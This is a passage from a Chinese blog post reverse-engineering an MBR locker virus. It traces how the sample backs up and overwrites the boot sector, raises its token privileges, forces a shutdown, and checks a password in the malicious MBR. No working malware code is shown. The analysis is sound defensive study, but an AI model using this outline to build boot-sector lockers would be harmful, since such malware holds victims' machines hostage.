<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203235954.png" alt></p>
<p>接着通过LoadLibraryA的方式加载kernel32.dll下的CreatFileA函数</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204210338.png" alt></p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">BOOL <span class="title">ReadFile</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">  HANDLE       hFile,</span></span></span><br><span class="line"><span class="function"><span class="params">  LPVOID       lpBuffer,</span></span></span><br><span class="line"><span class="function"><span class="params">  DWORD        nNumberOfBytesToRead,</span></span></span><br><span class="line"><span class="function"><span class="params">  LPDWORD      lpNumberOfBytesRead,</span></span></span><br><span class="line"><span class="function"><span class="params">  LPOVERLAPPED lpOverlapped</span></span></span><br><span class="line"><span class="function"><span class="params">)</span></span>;</span><br></pre></td></tr></table></figure>
<p>从指定的文件或输入/输出（I / O）设备读取数据。</p>
<p>可以看到程序将正常MBR内容读到了堆中</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204211226.png" alt></p>
<p>接着是写MBR的函数</p>
<p>通过前面的分析我们已经知道了写MBR函数是在sub_0040178E</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204204326.png" alt></p>
<p>在OD中在这个函数的位置下断点，接着单步调试同时观察winhex中的内容看扇区在哪个函数的位置被改变</p>
<p>接下来通过单步调试可以发现在函数sub_4019B0中调用了writefile实现写扇区的操作，将正常MBR从内存中写入了偏移为0x400的扇区</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204222437.png" alt></p>
<p>接着第二次调用write_mbr函数</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204222711.png" alt></p>
<p>然后在sub_4019B0中调用了writefile实现写扇区的操作，将恶意MBR从内存中写入MBR引导程序区</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204223003.png" alt></p>
<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p>完成了读写MBR操作后，恶意程序接下来的操作就是要关机，但是普通程序并不具有关机的权限，所以这里恶意程序先实现了提权的操作，在Windows下SeDebugPrivilege等关键字常常和提权相关，<br>一般搭配以下四个函数：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">GetCurrentProcessID 得到当前进程的ID</span><br><span class="line">OpenProcessToken 得到进程的令牌句柄</span><br><span class="line">LookupPrivilegeValue 查询进程的权限</span><br><span class="line">AdjustTokenPrivileges 判断令牌权限</span><br></pre></td></tr></table></figure></p>
<p>在IDA导入表中可以看到相关函数</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203211347.png" alt></p>
<p>再查看对该函数的交叉引用可以定位到提权函数</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203211410.png" alt></p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201203212040.png" alt></p>
<p>接下来介绍一些关于Windows进程权限相关的知识</p>
<h4 id="Windows权限与进程令牌"><a href="#Windows权限与进程令牌" class="headerlink" title="Windows权限与进程令牌"></a>Windows权限与进程令牌</h4><p>我们要修改一个进程的访问令牌，首先要获得进程访问令牌的句柄，这可以通过OpenProcessToken得到</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">　　<span class="function">BOOL <span class="title">OpenProcessToken</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">　　　　__in HANDLE ProcessHandle, <span class="comment">//要修改访问权限的进程句柄</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　　　__in DWORD DesiredAccess, <span class="comment">//指定你要进行的操作类型</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　　　__out PHANDLE TokenHandle <span class="comment">//返回的访问令牌指针</span></span></span></span><br><span class="line">　　)；</span><br></pre></td></tr></table></figure>
<blockquote>
<p>第一参数是要修改访问权限的进程句柄；<br>第二个参数指定你要进行的操作类型，<br>第三个参数就是返回的访问令牌指针；<br>如要修改访问令牌的特权，我们要指定第二个参数为TOKEN_ADJUST_PRIVILEGES = &amp;H20（其它一些参数可参考Platform SDK）。<br>通过这个函数我们就可以得到当前进程的访问令牌的句柄（指定函数的第一个参数为GetCurrentProcess()就可以了）。<br>接着我们可以调用AdjustTokenPrivileges对这个访问令牌进行修改。</p>
</blockquote>
<p>AdjustTokenPrivileges的原型如下：<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">　　<span class="function">BOOL <span class="title">AdjustTokenPrivileges</span><span class="params">(</span></span></span><br><span class="line"><span class="function"><span class="params">　　　　HANDLE TokenHandle, <span class="comment">// handle to token</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　　　BOOL DisableAllPrivileges, <span class="comment">// disabling option</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　　　PTOKEN_PRIVILEGES NewState, <span class="comment">// privilege information</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　　　DWORD BufferLength, <span class="comment">// size of buffer</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　　　PTOKEN_PRIVILEGES PreviousState, <span class="comment">// original state buffer</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　　　PDWORD ReturnLength <span class="comment">// required buffer size</span></span></span></span><br><span class="line"><span class="function"><span class="params">　　)</span></span>;</span><br></pre></td></tr></table></figure></p>
<blockquote>
<p>第一个参数是访问令牌的句柄；<br>第二个参数决定是进行权限修改还是丧失（Disable）所有权限；<br>第三个参数指明要修改的权限，是一个指向TOKEN_PRIVILEGES结构的指针，该结构包含一个数组，数据组的每个项指明了权限的类型和要进行的操作;<br>第四个参数是结构PreviousState的长度，如果PreviousState为空，该参数应为NULL；<br>第五个参数也是一个指向TOKEN_PRIVILEGES结构的指针，存放修改前的访问权限的信息，可空；<br>最后一个参数为实际PreviousState结构返回的大小。</p>
</blockquote>
<h3 id="关机"><a href="#关机" class="headerlink" title="关机"></a>关机</h3><p>关机操作同样是使用敏感函数进行分析，对于Windows系统来说要完成关机操作，通常的做法是以下几个函数<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">system()</span><br><span class="line">winexec()</span><br><span class="line">exitwindowsex()</span><br></pre></td></tr></table></figure></p>
<p>通过在IDA中查找相关函数，最终确定这个病毒使用的是第三个</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204225231.png" alt></p>
<h2 id="MBR引导代码分析"><a href="#MBR引导代码分析" class="headerlink" title="MBR引导代码分析"></a>MBR引导代码分析</h2><p>我们知道MBR的功能就是找到并且引导操作系统的启动程序，为了更好的理解MBR工作原理，我将MBR反汇编使用IDA分析</p>
<p>首先在winhex中选中MBR的512字节,右键编辑保存为新文件</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204225839.png" alt></p>
<p>使用IDA加载,选择16位汇编</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204230125.png" alt></p>
<p>并且加载到0x7c00的位置,可以看到汇编代码</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204230202.png" alt></p>
<p>通过分析,可以发现MBR汇编代码与上文提到的MBR功能相一致.</p>
<p>接下来分析一下恶意的MBR程序,使用同样的方法导出恶意MBR代码,使用IDA打开</p>
<p>可以看到这里IDA默认将代码解析成了数据</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204230619.png" alt></p>
<p>修改方式是在segment位置按一下C</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204230729.png" alt></p>
<p>分析这个恶意MBR程序只需要找到关键的几个INT指令就可以理清所有的逻辑了,我们可以看到程序先使用 INT 10H 这个是输出到屏幕的中断,所以我们可以判断这部分代码是为了在屏幕上输出提示输入密码的信息,接下来是一个INT 16H</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204230945.png" alt></p>
<p>这个是键盘输入的中断,我们可以判断出这是一个让用户输入密码的中断</p>
<p>接下来是两个INT 13H的中断</p>
<p><img src="https://ppplutoboke.oss-cn-beijing.aliyuncs.com/20201204231039.png" alt></p>
<p>这两个是分别对磁盘读和写的中断,这里的功能是如果用户输入的密码正确则将正确的MBR程序恢复到MBR引导扇区中完成正常的开机操作.</p>
<p>到这里这个MBR的所有重要功能以及主体汇编代码已经分析完了.</p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://yoursite.com">HackPluto</a>
            </p><p>原文链接：<a href="http://yoursite.com/2020/12/04/MBR病毒分析与逆向/">http://yoursite.com/2020/12/04/MBR病毒分析与逆向/</a>
            </p><p>发表日期：<a href="http://yoursite.com/2020/12/04/MBR病毒分析与逆向/">December 4th 2020, 11:14:25 pm</a>
            </p><p>更新日期：<a href="http://yoursite.com/2020/12/04/MBR病毒分析与逆向/">December 4th 2020, 11:16:17 pm</a>
            </p><p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2020/10/17/麒麟-qiling-框架使用/" title="麒麟(qiling)框架使用">
                    <div class="prevTitle">麒麟(qiling)框架使用</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:turing0day@gmail.com" class="iconfont-archer email" title="email"></a>
            
        
    
        
            
                <a href="https://github.com/HackPluto" class="iconfont-archer github" target="_blank" title="github"></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title="rss"></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#MBR锁机病毒原理分析与逆向分析"><span class="toc-number">1.</span> <span class="toc-text">MBR锁机病毒原理分析与逆向分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#MBR相关知识"><span class="toc-number">1.1.</span> <span class="toc-text">MBR相关知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MBR"><span class="toc-number">1.1.1.</span> <span class="toc-text">MBR</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#操作系统启动流程"><span class="toc-number">1.1.2.</span> <span class="toc-text">操作系统启动流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#什么是MBR锁机病毒"><span class="toc-number">1.1.3.</span> <span class="toc-text">什么是MBR锁机病毒</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#病毒原理"><span class="toc-number">1.2.</span> <span class="toc-text">病毒原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#逆向分析"><span class="toc-number">1.3.</span> <span class="toc-text">逆向分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#逆向思路"><span class="toc-number">1.3.1.</span> <span class="toc-text">逆向思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#读写扇区"><span class="toc-number">1.3.2.</span> <span class="toc-text">读写扇区</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#提权"><span class="toc-number">1.3.3.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Windows权限与进程令牌"><span class="toc-number">1.3.3.1.</span> <span class="toc-text">Windows权限与进程令牌</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#关机"><span class="toc-number">1.3.4.</span> <span class="toc-text">关机</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MBR引导代码分析"><span class="toc-number">1.4.</span> <span class="toc-text">MBR引导代码分析</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 58
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/04</span><a class="archive-post-title" href="/2020/12/04/MBR病毒分析与逆向/">MBR病毒分析与逆向</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/17</span><a class="archive-post-title" href="/2020/10/17/麒麟-qiling-框架使用/">麒麟(qiling)框架使用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/07</span><a class="archive-post-title" href="/2020/10/07/自己开发编译器-1/">自己开发编译器(1)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/05</span><a class="archive-post-title" href="/2020/10/05/蓝桥杯刷题记录/">蓝桥杯刷题记录</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/27</span><a class="archive-post-title" href="/2020/09/27/使用free-libc-任意切换程序libc版本/">使用free-libc,任意切换程序libc版本</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/27</span><a class="archive-post-title" href="/2020/09/27/netgear固件分析与后门植入/">netgear固件分析与后门植入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/27</span><a class="archive-post-title" href="/2020/09/27/使用firmware-mod-kit修改路由器固件/">使用firmware-mod-kit修改路由器固件</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/25</span><a class="archive-post-title" href="/2020/09/25/python多线程端口扫描器/">python多线程端口扫描器</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/24</span><a class="archive-post-title" href="/2020/08/24/Stunnel源码分析/">Stunnel环境配置与源码分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/23</span><a class="archive-post-title" href="/2020/08/23/2020强网杯线上赛pwn题解/">2020强网杯线上赛pwn题解</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/14</span><a class="archive-post-title" href="/2020/08/14/CVE-2018-16116，CVE-2018-16117漏洞分析复现/">SophosXG 防火墙:CVE-2018-16116，CVE-2018-16117漏洞分析复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/27</span><a class="archive-post-title" href="/2020/07/27/Wireshark分析TLS1-2通信过程/">Wireshark分析TLS1.2通信过程</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/27</span><a class="archive-post-title" href="/2020/07/27/基于机器学习的恶意流量监测及特征提取/">基于机器学习的TLS恶意流量监测</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/27</span><a class="archive-post-title" href="/2020/07/27/Netgear-R7000路由器栈溢出漏洞/">Netgear R7000路由器栈溢出漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/05</span><a class="archive-post-title" href="/2020/06/05/GKCTF2020-pwn/">GKCTF2020 pwn</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/07</span><a class="archive-post-title" href="/2020/05/07/Rust学习笔记/">Rust学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/01</span><a class="archive-post-title" href="/2020/05/01/CTFshow-WriteUp/">CTFshow WriteUp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/27</span><a class="archive-post-title" href="/2020/04/27/NPUCTF2020-pwn-WriteUp/">NPUCTF2020 pwn WriteUp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/26</span><a class="archive-post-title" href="/2020/04/26/ARM-pwn入门/">ARM pwn入门</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/23</span><a class="archive-post-title" href="/2020/04/23/2020-i-春秋-虎符杯-pwn-题解writeup/">2020 i-春秋 虎符杯 pwn 题解writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/22</span><a class="archive-post-title" href="/2020/04/22/Linux下动态链接分析/">Linux下动态链接完整流程分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/14</span><a class="archive-post-title" href="/2020/04/14/HITCON-Training-Writeup/">HITCON-Training-Writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/14</span><a class="archive-post-title" href="/2020/04/14/pwnable-kr-WriteUp/">pwnable.kr WriteUp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/14</span><a class="archive-post-title" href="/2020/04/14/BUUCTF刷题记录/">BUUCTF刷题1-100记录</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/03</span><a class="archive-post-title" href="/2020/01/03/PowerPC汇编学习/">PowerPC汇编学习</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/11</span><a class="archive-post-title" href="/2019/11/11/Linux堆溢出unlink攻击/">Linux堆溢出unlink攻击</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/06</span><a class="archive-post-title" href="/2019/11/06/Linux堆溢出漏洞--off-by-one/">Linux堆溢出漏洞--off-by-one</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/01</span><a class="archive-post-title" href="/2019/11/01/CCProxy栈溢出漏洞分析及利用/">CCProxy栈溢出漏洞分析及利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2019/10/28/DirtyCow漏洞复现及原理分析/">DirtyCow漏洞复现及原理分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/28</span><a class="archive-post-title" href="/2019/10/28/树状数组/">树状数组</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/17</span><a class="archive-post-title" href="/2019/10/17/堆的分配原理分析/">堆的分配原理分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/09</span><a class="archive-post-title" href="/2019/10/09/pwn-堆溢出/">PWN-堆溢出</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/30</span><a class="archive-post-title" href="/2019/09/30/格式化字符串漏洞/">格式化字符串漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/29</span><a class="archive-post-title" href="/2019/09/29/花式栈溢出技巧/">花式栈溢出技巧</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/27</span><a class="archive-post-title" href="/2019/09/27/看雪KCTF2019wp/">看雪KCTF2019wp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/24</span><a class="archive-post-title" href="/2019/09/24/反静态调试总结/">反静态调试总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span><a class="archive-post-title" href="/2019/09/20/msf恶意代码免杀总结/">msf恶意代码免杀总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/01</span><a class="archive-post-title" href="/2019/09/01/windows后渗透维权/">windows后渗透维权</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/14</span><a class="archive-post-title" href="/2019/08/14/基于BROP的栈溢出漏洞利用/">基于BROP的栈溢出漏洞利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/09</span><a class="archive-post-title" href="/2019/08/09/ACM数论/">ACM数论</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/06</span><a class="archive-post-title" href="/2019/08/06/Traceme动态分析与静态分析/">Traceme动态分析与静态分析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/01</span><a class="archive-post-title" href="/2019/08/01/Pwn-栈溢出与canary/">Pwn--栈溢出与绕过防护</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/01</span><a class="archive-post-title" href="/2019/08/01/SSH代理与端口转发/">SSH代理与端口转发</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/31</span><a class="archive-post-title" href="/2019/07/31/LAMP安装及配置/">LAMP安装及配置</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/13</span><a class="archive-post-title" href="/2019/06/13/攻防世界逆向入门writeup/">攻防世界逆向入门writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/12</span><a class="archive-post-title" href="/2019/06/12/2019看雪CTF逆向Q1writeup/">2019看雪CTF逆向Q1writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/02</span><a class="archive-post-title" href="/2019/06/02/Linux下的iptables详解/">Linux下的iptables详解</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/27</span><a class="archive-post-title" href="/2019/05/27/自己动手写工具(3)--ARP欺骗/">自己动手写工具(3)--ARP欺骗</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/22</span><a class="archive-post-title" href="/2019/05/22/素数个数求解与素数的判定/">素数个数求解与素数的判定</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/22</span><a class="archive-post-title" href="/2019/05/22/使用动态规划-DP-解决最大公共子串与最大公共子序列问题/">使用动态规划(DP)解决最大公共子串与最大公共子序列问题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/10</span><a class="archive-post-title" href="/2019/05/10/自己动手写工具(2)--TCP代理/">自己动手写工具(2)--TCP代理</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/10</span><a class="archive-post-title" href="/2019/05/10/CTF中的编码总结/">CTF中的编码总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/28</span><a class="archive-post-title" href="/2019/04/28/一次信息收集之绕过CDN查询真实ip/">一次信息收集之绕过CDN查询真实ip</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/25</span><a class="archive-post-title" href="/2019/04/25/信息收集之DNS域名解析/">信息收集之DNS域名解析</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/23</span><a class="archive-post-title" href="/2019/04/23/自己动手写工具(1)--Netcat/">自己动手写工具（1）--Netcat</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/19</span><a class="archive-post-title" href="/2019/04/19/python下多核/">python下多核，单核CPU对于并行，并发执行效率的对比</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/19</span><a class="archive-post-title" href="/2019/04/19/sqli-labs/">sqli-labs 通关详解</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/16</span><a class="archive-post-title" href="/2019/04/16/hello-world/">HackPluto's Blog</a>
        </li>
    
    </ul></div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="逆向,CTF"><span class="iconfont-archer">&#xe606;</span>逆向,CTF</span>
    
        <span class="sidebar-tag-name" data-tags="pwn"><span class="iconfont-archer">&#xe606;</span>pwn</span>
    
        <span class="sidebar-tag-name" data-tags="ACM,数论"><span class="iconfont-archer">&#xe606;</span>ACM,数论</span>
    
        <span class="sidebar-tag-name" data-tags="pwn,强网杯"><span class="iconfont-archer">&#xe606;</span>pwn,强网杯</span>
    
        <span class="sidebar-tag-name" data-tags="ctf,web,编码"><span class="iconfont-archer">&#xe606;</span>ctf,web,编码</span>
    
        <span class="sidebar-tag-name" data-tags="Linux,LAMP"><span class="iconfont-archer">&#xe606;</span>Linux,LAMP</span>
    
        <span class="sidebar-tag-name" data-tags="防火墙,iptables"><span class="iconfont-archer">&#xe606;</span>防火墙,iptables</span>
    
